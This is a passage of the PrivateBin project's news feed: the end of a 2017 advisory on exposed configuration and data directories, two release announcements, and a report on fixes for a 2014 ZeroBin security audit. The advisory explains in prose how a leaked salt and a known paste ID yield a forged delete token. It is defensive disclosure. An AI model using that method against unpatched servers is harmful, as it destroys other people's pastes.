&lt;p&gt;In reference to the &lt;a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:U/RC:C/CR:H/IR:H/AR:H"&gt;Common Vulnerability Scoring System v3.0&lt;/a&gt; we categorize this as a medium vulnerability. It can be exploited by remote attackers and it can leak confidential data (database passwords), so we consider it's confidentiality low, because it does not always leak such cinifdential data as passwords. In this calculator only the impact is considered, not the (special) condidtions, which we described above.&lt;/p&gt;
&lt;p&gt;In setups using the file store instead of databases, the pastes are stored as text files containing raw JSON data structures under the data folder. The server side JSON contains some information that is not exposed to client via the REST API. Using the leaked paste salt and the already known paste ID one can generate a &lt;code&gt;deletetoken&lt;/code&gt; using a SHA256 based &lt;a href="https://en.wikipedia.org/wiki/Hash-based_message_authentication_code"&gt;HMAC&lt;/a&gt; function passing the pastes ID as the key and the salt as the message. This allows an attacker to delete any paste, if they know it's ID, even without any knowledge of the paste key or contents. While this does not stricly leak sensitive or encrypted data, it is contrary to the design of the software, that only intends to give the paste creator the ability to delete a paste before it times out. Thus this can be used to cause a kind of "denial of service" attack.&lt;/p&gt;
&lt;h2&gt;Real-life impact&lt;/h2&gt;
&lt;p&gt;Prior to releasing/fixing details of the vulnerability, we notified affected server admins, who (&lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/PrivateBin-Directory"&gt;are listed on our wiki list&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;We identified &lt;strong&gt;six affected servers&lt;/strong&gt; affected by the config data leak. &lt;strong&gt;One&lt;/strong&gt; of these servers also leaked MySQL credentials. We contacted these and provided information in order to fix the data leak.&lt;/p&gt;
&lt;p&gt;Out of all contacted sites, &lt;strong&gt;four&lt;/strong&gt; fixed the issue at the time of the publication of this advisory. The site which leaked MySQL credentials has fixed the issue and reported to have changed the credentials.&lt;/p&gt;
&lt;h2&gt;Mitigation&lt;/h2&gt;
&lt;p&gt;Since April 29th, 2012 (&lt;a href="https://github.com/PrivateBin/PrivateBin/commit/ba90d0c"&gt;ba90d0c&lt;/a&gt;, while PrivateBin was still a fork of ZeroBin 0.15) we provided a way for server admins to secure their PrivateBin installation &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Installation#changing-the-path"&gt;by moving important directories out of the web root&lt;/a&gt;. When a server admin has done so, they are not affected by this issue.&lt;/p&gt;
&lt;p&gt;Secondly we always provided &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/cfg/.htaccess"&gt;a &lt;code&gt;.htaccess&lt;/code&gt; file&lt;/a&gt;, which automatically protected systems using the Apache server that do not disable the use of these.&lt;/p&gt;
&lt;p&gt;System administrators can also always configure their own web server themselves to protect these special directories.&lt;/p&gt;
&lt;p&gt;This vulnerability has been fixed in PrivateBin v1.1.1 released on 2017-10-10 with the commits &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/9215a9617ed1cd85bb29eb447e22834b0a322fac"&gt;9215a96&lt;/a&gt; and &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/6b87a6e0e134b33d8f65525250dc0cabfb11dfde"&gt;6b87a6e&lt;/a&gt;. Additionally we changed our installation instructions to stress our security recommendations.&lt;/p&gt;
&lt;h2&gt;Further information&lt;/h2&gt;
&lt;p&gt;Administrators that are affected by this issue and saved confidential data (such as database passwords) in their config file, are strongly advised to change these credentials.&lt;/p&gt;
&lt;p&gt;System administrators of the instances, where the &lt;code&gt;cfg/&lt;/code&gt; and &lt;code&gt;data/&lt;/code&gt; directory are accessible, should protect these directories with an appropriate web server configuration or &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Installation#changing-the-path"&gt;by following these steps&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;2017-09-29 – Reporter &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/251"&gt;asked for contact information&lt;/a&gt;, got a tip from collaborator.&lt;/li&gt;
&lt;li&gt;2017-09-29 – Reporter privately reported issue.&lt;/li&gt;
&lt;li&gt;2017-09-29 – Receipt confirmed.&lt;/li&gt;
&lt;li&gt;2017-09-29 – Issue confirmed and preliminary patch provided to reporter.&lt;/li&gt;
&lt;li&gt;2017-10-01 – Server admins contacted.&lt;/li&gt;
&lt;li&gt;2017-10-04 – Restructured installation instructions.&lt;/li&gt;
&lt;li&gt;2017-10-10 – &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/tag/1.1.1"&gt;Release published&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;2017-10-10 – Vulnerability details published.&lt;/li&gt;
&lt;/ul&gt;</content><category term="Reports"/><category term="PrivateBin"/><category term="Security"/></entry><entry><title>Release v1.1 - PrivateBin in Italian and Russian</title><link href="https://privatebin.info/news/v1.1-release.html" rel="alternate"/><published>2016-12-26T12:00:00+01:00</published><updated>2017-01-14T15:00:00+01:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2016-12-26:/news/v1.1-release.html</id><summary type="html">&lt;p&gt;This release adds Italian and Russian translations to PrivateBin and fixes an XSS and a database issue.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release adds Italian and Russian translations to PrivateBin and fixes an XSS and a database issue.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Fortunately the CSP headers introduced in version 1.0 suppressed the XSS issue in modern browsers. But &lt;a href="http://caniuse.com/contentsecuritypolicy"&gt;older browsers&lt;/a&gt; would still be affected when clicking on the "Raw text" button of a markdown formatted paste containing JavaScript. The issue was introduced with the change in version 1.0 that displays markdown code instead of the rendered HTML in the "raw" mode.&lt;/p&gt;
&lt;p&gt;The other fixed issue concerns the automatic purging of outdated pastes, which was introduced in version 1.0. When using the database model instead of the default file based store, pastes set to "never" expire were always purged, too.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;If you are using the database model instead of the filesystem one and offer pastes that "never" expire, then you should upgrade or disable the purge by &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#purge"&gt;setting the &lt;code&gt;batchsize&lt;/code&gt; to 0 in your configuration&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Apart from fixing the XSS issue, markdown pastes containing HTML code will now be properly displayed in the "raw" mode.&lt;/p&gt;
&lt;p&gt;Both of these issues affected only version 1.0. There are of course &lt;a href="https://privatebin.info/news/v1.0-release.html"&gt;many more benefits in switching to this release&lt;/a&gt;, if you are still using a version of PrivateBin or ZeroBin before 1.0.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;When updating please make sure to adjust the &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#cspheader"&gt;&lt;code&gt;cspheader&lt;/code&gt;&lt;/a&gt; setting. We recommend you to either comment the setting out in order to use our default &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/1.1/cfg/conf.ini.sample#L63"&gt;recommend CSP header&lt;/a&gt; or adjust the header so it matches the new default one (mainly just add the &lt;code&gt;referrer no-referrer;&lt;/code&gt; part).&lt;/p&gt;
&lt;h2&gt;Changes since version 1.0&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Translations for Italian and Russian&lt;/li&gt;
&lt;li&gt;ADDED: Loading message displayed until decryption succeeded for slower (in terms of CPU or network) systems&lt;/li&gt;
&lt;li&gt;ADDED: Dockerfile for docker container creation&lt;/li&gt;
&lt;li&gt;CHANGED: Using modal dialog to request password input instead of native JS input window (&lt;a href="https://github.com/PrivateBin/PrivateBin/issues/69"&gt;#69&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;CHANGED: Suppressed referrer HTTP header sending when following links in a paste or comment (&lt;a href="https://github.com/PrivateBin/PrivateBin/issues/96"&gt;#96&lt;/a&gt;) and added additional HTTP headers for XSS mitigation (&lt;a href="https://github.com/PrivateBin/PrivateBin/issues/91"&gt;#91&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;CHANGED: Updated random_compat and jQuery libraries&lt;/li&gt;
&lt;li&gt;FIXED: XSS using JavaScript stored as markdown formatted paste, after clicking on Raw paste button (&lt;a href="https://github.com/PrivateBin/PrivateBin/issues/137"&gt;#137&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;FIXED: Automatic purging deleting non-expiring pastes, when using database store (&lt;a href="https://github.com/PrivateBin/PrivateBin/issues/149"&gt;#149&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We wish you a happy new year!&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.0 - The ZeroBin fork is now called PrivateBin</title><link href="https://privatebin.info/news/v1.0-release.html" rel="alternate"/><published>2016-08-25T11:50:00+02:00</published><updated>2016-08-25T11:50:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2016-08-25:/news/v1.0-release.html</id><summary type="html">&lt;p&gt;This is the first release of PrivateBin after renaming the ZeroBin fork.&lt;/p&gt;</summary><content type="html">&lt;!-- short intro --&gt;
&lt;p&gt;&lt;strong&gt;This is the first release of PrivateBin after renaming the ZeroBin fork. We decided to use the version number 1.0 for this release as we consider PrivateBin now very mature and feature complete. We recommend everyone to update as this version features many security improvements.&lt;/strong&gt;&lt;/p&gt;
&lt;!-- reasons for renaming &amp; new version--&gt;
&lt;p&gt;The renaming of ZeroBin to PrivateBin is done to highlight the huge developments (over 500 commits) which have happened since ZeroBin stopped being actively maintained by its original creator Sébastien Sauvage in 2014. By choosing to release version 1.0 we also want to emphasize the many feature changes - according to &lt;a href="http://semver.org/"&gt;semantic versioning&lt;/a&gt; - and want to show that PrivateBin is now considered mature. Hence a version number smaller than 1.0 just does not seem suitable for PrivateBin anymore.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;!-- How to update from ZeroBin to PrivateBin? / What changes for server admins? --&gt;

&lt;p&gt;Make sure your system has some source for cryptographically safe random numbers! Either use PHP 7 or one of the supported fallbacks: &lt;a href="https://paragonie.com/book/pecl-libsodium/read/00-intro.md#installing-libsodium"&gt;libsodium&lt;/a&gt;, open_basedir access to &lt;code&gt;/dev/urandom&lt;/code&gt;, mcrypt or com_dotnet. The previous workaround using &lt;code&gt;mt_rand()&lt;/code&gt; was removed, as it leads to unsafe and predictable numbers.&lt;/p&gt;
&lt;p&gt;Otherwise, as usual, only the files need to be updated. The &lt;code&gt;tmp&lt;/code&gt; folder for the compiled RainTPL templates can be removed, since we switched to a more lightweight template approach due to RainTPL not being maintained anymore. Have a look at or &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Templates"&gt;template documentation&lt;/a&gt; to learn how to upgrade your custom template to the new system.&lt;/p&gt;
&lt;p&gt;There are some new options in the &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration"&gt;configuration&lt;/a&gt; file. If you are updating from an older ZeroBin install and want to keep existing pastes accessible, make sure to enable the option &lt;code&gt;zerobincompatibility&lt;/code&gt;. Otherwise more secure settings are used which break compatibility with ZeroBin.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;!-- What changes for server users? --&gt;

&lt;p&gt;As a user of a ZeroBin instance nothing changes. As soon as the server administrator upgrades to PrivateBin, you can continue using it. We took great efforts to ensure that existing pastes are still fully compatible with the current release.&lt;/p&gt;
&lt;p&gt;Since version 0.22 we added a Slowene and Chinese translation, an (optional) URL shortener button, a preview tab to help you chose the right format for your content and many other small user interface improvements to make your life a bit more comfortable.&lt;/p&gt;
&lt;!-- Why server admins should update --&gt;
&lt;p&gt;With this release we have improved the security of PrivateBin as we have now &lt;a href="https://privatebin.info/news/zerobin-audit.html"&gt;addressed most concerns&lt;/a&gt; raised in a security audit of the original ZeroBin in 2014.&lt;/p&gt;
&lt;p&gt;Furthermore we switched to AES Galois/Counter mode, which is considered a stronger encryption mode then the previously used AES Counter mode with CBC-MAC authentication. The main benefit here is that the authentication (as the pastes/comments are sent over network you want to ensure that your content is not accidentally or maliciously manipulated) is done on the encrypted text instead of the plain text. The potential parallelization of CCM could not be implemented in the single threaded Javascript environment of webbrowsers, anyway.&lt;/p&gt;
&lt;p&gt;We also make use of a new browser security feature called &lt;a href="https://scotthelme.co.uk/content-security-policy-an-introduction/"&gt;Content Security Policy&lt;/a&gt;, which prevents &lt;a href="https://en.wikipedia.org/wiki/Cross-site_scripting"&gt;XSS attacks&lt;/a&gt; in an effective way. It blocks any third party scripts and resources to be executed in the context of the application.&lt;/p&gt;
&lt;p&gt;Additionally we started using the new subresource integrity (&lt;a href="http://www.w3.org/TR/SRI/"&gt;SRI&lt;/a&gt;) browser feature to avoid loading manipulated scripts under man-in-the-middle attacks. Additionally this allows privacy aware users to easily check for manipulated scripts in the source code of the website and to compare them to the hashes of the official PrivateBin release of that version.&lt;/p&gt;
&lt;p&gt;To ensure that PrivateBins code is of high quality we &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/22"&gt;added various code quality checkers&lt;/a&gt; and subsequently improved the code. These analysers also helped us to &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/41"&gt;find some potential vulnerabilities&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you have further questions or issues have a look at the new &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/FAQ"&gt;FAQ&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Changes since version 0.22&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Translations for Slowene and Chinese&lt;/li&gt;
&lt;li&gt;ADDED: re-introduced (optional) URL shortener support, which was removed back in version 0.16 for privacy concerns&lt;/li&gt;
&lt;li&gt;ADDED: Preview tab, helpful for writing markdown code or check the source code rendering&lt;/li&gt;
&lt;li&gt;ADDED: Automatic purging of expired pastes, done on paste creation&lt;/li&gt;
&lt;li&gt;ADDED: Option to disable icons in discussions (will only affect newly created pastes)&lt;/li&gt;
&lt;li&gt;ADDED: Composer support&lt;/li&gt;
&lt;li&gt;CHANGED: Renamed the ZeroBin fork to PrivateBin&lt;/li&gt;
&lt;li&gt;CHANGED: Removed unmaintained RainTPL template engine, replacing the templates with straight forward PHP files&lt;/li&gt;
&lt;li&gt;CHANGED: New logo and favicons&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading SJCL library to 1.0.4&lt;/li&gt;
&lt;li&gt;CHANGED: Switched to GCM instead of CCM mode for AES encryption for newly created pastes&lt;/li&gt;
&lt;li&gt;CHANGED: Use backported random bytes function from PHP7 for older PHP versions instead of mcrypt&lt;/li&gt;
&lt;li&gt;CHANGED: Switched to a SHA256 HMAC of the IP in traffic limiter instead of storing it in plain text on the server&lt;/li&gt;
&lt;li&gt;CHANGED: Introduced content security policy header to reduce cross site scripting (XSS) risks&lt;/li&gt;
&lt;li&gt;CHANGED: Added SHA512 subresource integrity hashes for all javascript includes to reduce the risk of manipulated scripts and easier detection of such&lt;/li&gt;
&lt;li&gt;CHANGED: Refactored PHP code to conform to PSR-4 and PSR-2 standards&lt;/li&gt;
&lt;li&gt;CHANGED: Switched to Identicons as the default for comments with nicknames&lt;/li&gt;
&lt;li&gt;CHANGED: Vizhash is now optional and based on (128 byte) SHA512 HMAC instead of (144 byte) combination of MD5, SHA1 and a reversal of that string&lt;/li&gt;
&lt;li&gt;FIXED: Content-type negociation for HTML in certain uncommon browser configurations&lt;/li&gt;
&lt;li&gt;FIXED: JavaScript error displayed before page is loaded or during attachment load&lt;/li&gt;
&lt;li&gt;FIXED: Don't strip space characters at beginning or end of optional password&lt;/li&gt;
&lt;li&gt;FIXED: Various UI glitches in mobile version or on smaller desktops with language menu, button spacing and long URLs&lt;/li&gt;
&lt;li&gt;FIXED: Back button now works as expected after switching to raw text view of a paste&lt;/li&gt;
&lt;li&gt;FIXED: Reactivated second error message above send comment button to ensure its visibility when the main error message is outside the viewport&lt;/li&gt;
&lt;li&gt;FIXED: Raw text now displays original markdown instead of rendered HTML&lt;/li&gt;
&lt;li&gt;FIXED: Removed unused code detected with the help of various code review tools&lt;/li&gt;
&lt;li&gt;FIXED: Table format for PostgreSQL, making it possible to use PostgreSQL as backend in addition to MySQL, SQLite and flat files&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We hope you will enjoy the new PrivateBin!&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Measures taken after the 2014 ZeroBin security audit</title><link href="https://privatebin.info/reports/zerobin-audit.html" rel="alternate"/><published>2016-08-24T19:23:00+02:00</published><updated>2016-08-24T19:23:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2016-08-24:/reports/zerobin-audit.html</id><summary type="html">&lt;p&gt;Measures taken against the issues raised in the 2014 ZeroBin security audit.&lt;/p&gt;</summary><content type="html">&lt;p&gt;Back on February 2nd, 2014 Taylor Hornby kindly performed a &lt;a href="https://defuse.ca/audits/zerobin.htm"&gt;security audit of ZeroBin&lt;/a&gt; "for free as a service to the free/opensource community".&lt;/p&gt;
&lt;p&gt;Some of the issues brought up were already fixed in 2014 by Sébastien Sauvage. Before releasing a stable version of the PrivateBin fork, we wanted to make sure to address all remaining issues as best as we could. Here is an overview over each point and the measures taken on them.&lt;/p&gt;
&lt;h2&gt;2.1. Salt and HMAC Key Generated with mt_rand()&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Exploitability: Medium&lt;br&gt;
Security Impact: Low&lt;/p&gt;
&lt;p&gt;In serversalt.php, generateRandomSalt() generates a salt using the mt_rand() pseudo-random number generator. Because mt_rand() is not a cryptographic random number generator, this function will return easily-guessed salts with a much higher probability of collision.&lt;/p&gt;
&lt;p&gt;The salts generated by this function are relied on for security. For example, it is used as an HMAC key when checking delete tokens in processPasteDelete(). It should be replaced with mcrypt_create_iv() or openssl_random_pseudo_bytes().&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Four days after the release of the audit, &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/e7feca0e53d77a13745db865ae860ce7da184dee"&gt;Seb fixed this&lt;/a&gt; by using the mcrypt extension instead, if present. mt_rand was still in use as a fallback until and including version 0.22 of the ZeroBin fork.&lt;/p&gt;
&lt;p&gt;For the upcoming release we decided to remove the fallback to &lt;code&gt;mt_rand()&lt;/code&gt; completly and switch to PHP 7's &lt;a href="https://secure.php.net/manual/function.random-bytes.php"&gt;&lt;code&gt;random_bytes()&lt;/code&gt;&lt;/a&gt; instead, providing a couple of fallbacks for older PHP versions by using the &lt;a href="https://github.com/paragonie/random_compat"&gt;random_compat&lt;/a&gt; library. With this change, the following sources of cryptographically safe random numbers are used in the following priority:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;PHP 7's &lt;code&gt;random_bytes()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;libsodium&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/dev/urandom&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;mcrypt&lt;/li&gt;
&lt;li&gt;com_dotnet&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;More information about the order and reasons for this can be found in the &lt;a href="https://github.com/paragonie/random_compat/blob/master/ERRATA.md"&gt;official documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We consider this point resolved.&lt;/p&gt;
&lt;h2&gt;2.2 Fixed Server Salt&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Exploitability: Low&lt;br&gt;
Security Impact: Low&lt;/p&gt;
&lt;p&gt;The security of the VizHash hashes of IP addresses (used to generate comment avatars) and delete tokens both rely on a fixed "salt" which is generated once per deployment, saved in data/salt.php.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We switched to creating a salt per paste, which is used to create the delete tokens.&lt;/p&gt;
&lt;p&gt;Using a paste specific salt for the VizHashes in comments with nicknames would make it impossible to recognize the same IP accross pastes and therefore make the use of VizHashes moot.&lt;/p&gt;
&lt;p&gt;We consider this point solved for the delete tokens. Regarding the VizHashes, server admins now have the option to &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#icon"&gt;disable icons in the configuration file&lt;/a&gt; to avoid this risk and users can simply choose to comment anonymously without nickname.&lt;/p&gt;
&lt;p&gt;All in all we consider this point partly resolved. We provided reasonable configuration options for admins wanting to enhance the security of their PrivateBin instance.&lt;/p&gt;
&lt;h2&gt;2.3. Traffic Limiter Race Conditions&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;To rate limit requests, ZeroBin keeps a history of hit times in data/traffic_limiter.php, which is generated and re-generated in traffic_limiter_canPass(). Because requests can be made asynchronously, the file may become corrupted.&lt;/p&gt;
&lt;p&gt;This might allow remote code execution, if the attacker is clever enough to corrupt the file in just the right way, since the traffic_limiter.php file is require()'d.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Although the &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/4f72f04edab358e34d2bfeef0ffff74b2f302b97"&gt;patch for this&lt;/a&gt; was already sent in at September 28th, 2013, the &lt;a href="https://github.com/sebsauvage/ZeroBin/pull/61"&gt;pull request&lt;/a&gt; was only merged a day after the release of the security audit.&lt;/p&gt;
&lt;p&gt;We consider this point resolved.&lt;/p&gt;
&lt;h2&gt;2.4. VizHash IP Address Online Guessing&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Exploitability: Very Low&lt;br&gt;
Security Impact: Low&lt;/p&gt;
&lt;p&gt;The VizHash system is used to give users who comment an avatar derived from their IP address. If an attacker can create connections to the ZeroBin server from arbitrary source IPs (e.g. if they are in the same LAN as the ZeroBin server, or man-in-the-middling its traffic), they can perform an online guessing attack on the VizHash they are interested in.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;As explained above this is an inherant problem of using IP based icons. Apart from the option to &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#icon"&gt;disable icons in the configuration file&lt;/a&gt; to avoid this risk for server admin and the option for users to simply not comment with a nickname, we also &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/3988b860b0150fd9944a634d2b93dbd6706ae957"&gt;switched to using a SHA512 HMAC&lt;/a&gt; instead of the odd combination of MD5, SHA1 and a reversal of these that was used in VizHash originally.&lt;/p&gt;
&lt;p&gt;We consider to have reduced the risk of this point and given options to both server admins and users to avoid it completly. We could disable icons by default, to solve it permanently.&lt;/p&gt;
&lt;h2&gt;2.5. Relies on .htaccess files, which may not be enabled.&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Exploitability: N/A&lt;br&gt;
Security Impact: Very Low&lt;/p&gt;
&lt;p&gt;ZeroBin relies on .htaccess files being enabled to prevent access to the 'data' directory. This directory contains the ciphertexts, salt, and rate limiter array. If .htaccess is disabled, of if ZeroBin is installed on a non-Apache web server, then an attacker may be able to access these files.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Back in 2015 we implemented an option that allows server admins to install most sensitive parts of the application outside of the webservers document root. This is explained in the &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Installation#changing-the-path"&gt;installation documentation&lt;/a&gt;. The .htaccess files are still generated to protect lazy server admins that use an Apache webserver.&lt;/p&gt;
&lt;p&gt;We consider this point resolved.&lt;/p&gt;
&lt;h2&gt;2.6. The robots.txt does not work in a subdomain.&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Exploitability: N/A&lt;br&gt;
Security Impact: Low&lt;/p&gt;
&lt;p&gt;ZeroBin uses a robots.txt file to prevent search engines from indexing the posts. If you install ZeroBin into a subdirectory, this does not work.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We added a section to the &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Installation#web-server-configuration"&gt;installation documentation&lt;/a&gt; to remind server admins to change the file if PrivateBin runs in a subdirectory.&lt;/p&gt;
&lt;p&gt;We consider this point resolved.&lt;/p&gt;
&lt;h2&gt;2.7 HMAC Not Compared in Constant Time&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Exploitability: Medium&lt;br&gt;
Security Impact: Low&lt;/p&gt;
&lt;p&gt;ZeroBin uses an HMAC to generate and check delete tokens. The HMAC is compared against the correct one with PHP's "!=" operator. A timing attack can exploit this error to compute the HMAC of arbitrary data with the server's salt.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Seb &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/43a439e7d001dd223028403f2453347438d13e27#diff-36bd4922e41559de5d469fca7586b185R75"&gt;implemented&lt;/a&gt; the suggested &lt;code&gt;slow_equals()&lt;/code&gt; function on February 6th, 2014.&lt;/p&gt;
&lt;p&gt;We consider this point resolved.&lt;/p&gt;
&lt;h2&gt;2.8. Arbitrary File Unlink&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Exploitability: Medium&lt;br&gt;
Security Impact: High&lt;/p&gt;
&lt;p&gt;An attacker can delete arbitrary files on the server by exploiting a vulnerability in processPasteDelete().&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This was addressed in the same &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/43a439e7d001dd223028403f2453347438d13e27#diff-27157d1769dc1d554afb0b1d71c76da4R350"&gt;cherry picked and merged commit&lt;/a&gt; in August 15th, 2015 that mainly addressed 2.7 above. Not only is the paste ID now checked for general format validity (16 hexadecimal characters), but also if that paste actually exists.&lt;/p&gt;
&lt;p&gt;We consider this point resolved.&lt;/p&gt;
&lt;h2&gt;2.9. HMAC Uses SHA1 instead of SHA256&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Exploitability: Very Low&lt;br&gt;
Security Impact: Low&lt;/p&gt;
&lt;p&gt;ZeroBin uses a SHA1 HMAC to derive the delete token. SHA1 should be replaced with a better hash function, like SHA256.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This was addressed in a &lt;a href="https://github.com/elrido/ZeroBin/commit/0e217a42c5b53648e05f37dd08a66c01b7ff2022#diff-12153bdedae2a330533f510bb411f16eR163"&gt;commit&lt;/a&gt; on July 6th, 2016. As this is a breaking change (it means that old deletion links will no longer work) it is enabled by default, but for admins upgrading from older installs there is an option &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#zerobincompatibility"&gt;&lt;code&gt;zerobincompatibility&lt;/code&gt;&lt;/a&gt; to return to the old behaviour.&lt;/p&gt;
&lt;p&gt;We consider this point resolved.&lt;/p&gt;
&lt;h2&gt;2.10. No Cross-Site Request Forgery Protection&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Exploitability: Medium&lt;br&gt;
Security Impact: Medium&lt;/p&gt;
&lt;p&gt;ZeroBin does not attempt to prevent Cross-Site Request Forgery (CSRF) attacks. A malicious website can make a user's browser delete ZeroBin posts (if the delete token is known), create posts, and post comments to existing posts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Due to the nature of PrivateBin it is inherently possible to create pastes and comments anonymously. Hence we can't just introduce a user account system or API tokens. As we plan to allow alternative clients to use existing PrivateBin instances adding a CORS or CSP header to disallow external sources to access the API would not work either.&lt;/p&gt;
&lt;p&gt;We consider this an ongoing design challenge and still keep an &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/39"&gt;open issue&lt;/a&gt; on this point.&lt;/p&gt;
&lt;h2&gt;3.1. Always Assume Malice&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;When a string is used in a way that might affect security, it should always be assumed to be malicious, even if it is just a constant string.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;All the mentioned examples were escaped and/or reinforced with checks. Unit testing was used to ensure that these filtering functions aren't weakened in some later regression.&lt;/p&gt;
&lt;p&gt;This danger also applies for any newly created template. We addressed this with a reminder on escaping in the &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Templates#creating-templates"&gt;template creation documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We consider this point resolved.&lt;/p&gt;
&lt;h2&gt;4.1. Secure Code Delivery&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;ZeroBin relies on the JavaScript code being delivered securely. A malicious server or man-in-the-middle can modify the code to leak the key. This is already well known and is being addressed in &lt;a href="https://github.com/sebsauvage/ZeroBin/issues/17"&gt;GH17&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The method using a JS snipped to validate hashes of the JS code was never implemented. We did instead &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/f72e260ee72473190868bcad8ec17dcf783e33c2#diff-6b90ecf4584d0fc9214ee51d932caa80R290"&gt;implement&lt;/a&gt; subresource integrity (&lt;a href="http://www.w3.org/TR/SRI/"&gt;SRI&lt;/a&gt;) hashes on August 16th, 2016. Combined with content security policy (&lt;a href="http://content-security-policy.com/"&gt;CSP&lt;/a&gt;) headers, this limits the attack surface to man-in-the-middle attacks on the index.html file and rogue server admins.&lt;/p&gt;
&lt;p&gt;Server admins can reduce the potential for man-in-the-middle attacks by setting up HTTPS following high standards. We &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/d042bb41ba16f2beaa5b5c26edd444c6954da8d4#diff-04c6e90faac2675aa89e2176d2eec7d8R24"&gt;documented&lt;/a&gt; this in the main README.md of the project and also added some &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/bba485ef6d1f51f4c69dbcd8e606f97a585ddac0#diff-04c6e90faac2675aa89e2176d2eec7d8R32"&gt;recommendations&lt;/a&gt; on how to set up HTTPS more securely.&lt;/p&gt;
&lt;p&gt;For users we provide &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/FAQ#which-privatebin-server-should-i-use"&gt;recommendations&lt;/a&gt; how they can find the best servers.&lt;/p&gt;
